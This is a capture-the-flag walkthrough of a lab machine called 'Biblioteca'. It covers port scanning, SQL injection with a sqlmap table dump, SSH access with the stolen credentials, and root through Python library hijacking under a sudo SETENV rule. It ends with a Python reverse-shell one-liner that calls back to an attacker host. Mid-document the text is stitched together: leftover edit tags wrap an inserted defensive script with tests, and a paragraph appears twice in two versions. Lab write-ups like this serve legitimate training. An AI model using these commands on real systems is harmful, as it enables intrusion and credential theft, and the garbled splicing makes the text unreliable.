# Biblioteca

## Nmap

```
sudo nmap 10.10.198.83 -p- -sS -sV       

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Starting out, we look at port 8000, which is running Werkzeug. Looking up the version number with `searchsploit` shows no exploits available.

The root page of the web server shows us a login page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNnEJVCBRam3dQXIaUpWA%2Fimage.png?alt=media\&token=fc739c56-b339-4a91-a632-d3b475a28869)

Using the link at the bottom of the page we move over to a registration form. Signing up with an account is successful.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCFvHCXuFakROR2mjXkzr%2Fimage.png?alt=media\&token=9674c231-79e5-4342-bbc7-dacda9cdb4b2)

We are then able to login with our newly created account.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F6Qz2Z5AeGsIdiVud7lKa%2Fimage.png?alt=media\&token=ed342f0e-dbe8-4845-aa40-3fac5088c213)

However, from here I was unable to enumerate further files or directories. After running exhaustive searches, I then started ZAP Proxy. Using the active scan feature, ZAP flags a SQL injection on the web server's login page.

Firstly, we save the login request from ZAP to the attacking computer.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FIPA1PYANY4Mt2ojm0RkW%2Fimage.png?alt=media\&token=28c14f74-3abf-49a5-b0bd-4048c81ca1f6)

Then we use it with `sqlmap` as shown below.

```bash
sqlmap -r request.raw --batch -D website -T users --dump
```

With the right command built to dump the `users` table of the `website` database, we see stored credentials for the user smokey.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F05jfpAvHmwMwGDPS4muM%2Fimage.png?alt=media\&token=71d9574e-6eb2-4a23-8d99-5bf7533a081f)

From there, we are able to log in over SSH with the found credentials.

```bash
ssh smokey@<IP>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwPfTUOYfzTT8rCPLWADf%2Fimage.png?alt=media\&token=7b58d63b-4a0f-4d51-80e1-13d26a1ffbd2)

Viewing the home directories, we notice the user *hazel*. We find we are able to `su` to hazel using her username as the password, and we are also able to log in over SSH with the same credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F84rZOeg966iKs5FvofiN%2Fimage.png?alt=media\&token=3b004677-002e-42f1-9584-38f9eb9dc9b8)

Checking `sudo -l`, we notice that we are able to run `/home/hazel/hasher.py` with the python3 binary as root, without specifying a password. Interestingly, the `SETENV:` tag also means we are allowed to set the `PYTHONPATH` environment variable when running that command.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2TWIZ2bp5pGkWHY3j1zd%2Fimage.png?alt=media\&token=16dbe38d-5bb5-413e-93a3-0ba50ed2a054)

The exploit method here is known as "Python library hijacking". I have linked a well-written article below, which serves as a basis for the exploit path on this page.

**URL** <https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8>

Essentially, `SETENV:` allows us to set the `PYTHONPATH` environment variable, which controls where Python searches for modules before it falls back to the standard library.
</gre_replace>
<gr_insert after="64" cat="add_content" lang="python" orig="Essentially, `SETENV:`">
To make the mechanism concrete from the defender's side, here is an added illustration (not code from the writeup or the lab): it shows that a directory placed on `PYTHONPATH` is searched before the standard library, so a file named `hashlib.py` there shadows the real module, and it flags sudoers rules that combine `SETENV:` with a script interpreter. The sudoers text is a constructed sample, and the shadow module it writes only prints a message.

```python
import os
import sys
import sysconfig
import tempfile
from importlib.machinery import PathFinder


def resolve_module(name, search_path):
    """Return the file a module would load from, honouring search_path order
    (PathFinder does not consult sys.modules, so this is a pure lookup)."""
    spec = PathFinder.find_spec(name, search_path)
    return spec.origin if spec else None


def shadowed_stdlib_modules(pythonpath, names):
    """Return {module: path} for modules that the given PYTHONPATH value would
    resolve from somewhere other than the interpreter's stdlib directory."""
    stdlib = os.path.realpath(sysconfig.get_paths()["stdlib"])
    # The interpreter prepends PYTHONPATH entries to sys.path; mirror that.
    search = [p for p in pythonpath.split(os.pathsep) if p] + sys.path
    hits = {}
    for name in names:
        origin = resolve_module(name, search)
        if origin and not os.path.realpath(origin).startswith(stdlib):
            hits[name] = origin
    return hits


def demo_shadowing():
    # Constructed scenario: a harmless hashlib.py dropped into a temp dir.
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "hashlib.py"), "w") as f:
        f.write("print('shadow module loaded')\n")
    return shadowed_stdlib_modules(tmp, ["hashlib", "os", "socket"])


# Constructed sudoers sample, not the lab's real file.
SUDOERS_SAMPLE = """\
root ALL=(ALL:ALL) ALL
hazel ALL=(root) NOPASSWD: SETENV: /usr/bin/python3 /home/hazel/hasher.py
smokey ALL=(root) /usr/bin/systemctl restart nginx
"""


def risky_setenv_rules(sudoers_text, interpreters=("python", "perl", "ruby", "node")):
    """Flag rules that pair SETENV with an interpreter: the caller can then
    seed PYTHONPATH-style search paths for a command that runs as root."""
    flagged = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "SETENV:" not in line:
            continue
        command = line.split("SETENV:", 1)[1]
        if any(interp in command for interp in interpreters):
            flagged.append(line)
    return flagged
```

Dropping `SETENV:` from the rule, or invoking the script with `python3 -I` (isolated mode ignores `PYTHONPATH` and the script directory), closes this particular path.
<test>
hits = demo_shadowing()
assert "hashlib" in hits
assert hits["hashlib"].endswith("hashlib.py")
assert "os" not in hits
assert "socket" not in hits
assert shadowed_stdlib_modules("", ["hashlib"]) == {}
flagged = risky_setenv_rules(SUDOERS_SAMPLE)
assert len(flagged) == 1
assert flagged[0].startswith("hazel")
assert risky_setenv_rules("smokey ALL=(root) /usr/bin/systemctl restart nginx") == []
</test>
</gr_insert>
<gr_replace lines="66" cat="clarify" orig="Reading the contents">
Reading the contents of `hasher.py`, we see the script imports the module `hashlib`. We can create a Python reverse shell called `hashlib.py` in the `/tmp` directory. After doing so, we run the sudo command with `PYTHONPATH` pointing at `/tmp`, so that directory is searched first when Python loads the modules `hasher.py` imports; this should execute our reverse shell as root.

Reading the contents of `hasher.py` we see the script imports the module hashlib. We can create a python reverse shell called `hashlib.py` in the `/tmp` directory. After doing so, we can run the sudo command and set where the PYTHONPATH looks first when attempt to load external modules references in `hasher.py`, this should execute our reverse shell.

Create a new `hashlib.py` file in `/tmp` with the following contents.

```python
import os

# Stand-in for the real hashlib module: prints which user executes it
os.system("whoami")
```

Then test it:

```bash
sudo PYTHONPATH=/tmp /usr/bin/python3 /home/hazel/hasher.py
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNgdRhebCXOkXWR7yyLZx%2Fimage.png?alt=media\&token=3bb0ffbd-dd16-4edf-8fd4-2175cece8fec)

With root execution confirmed, we then replace the contents of `/tmp/hashlib.py` with a python3 reverse shell and catch it on our attacking system with a `netcat` listener.

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBZwyYhrnYnbxalHQMl33%2Fimage.png?alt=media\&token=dbfc782a-b22c-4883-b3db-2ad2eae21c46)
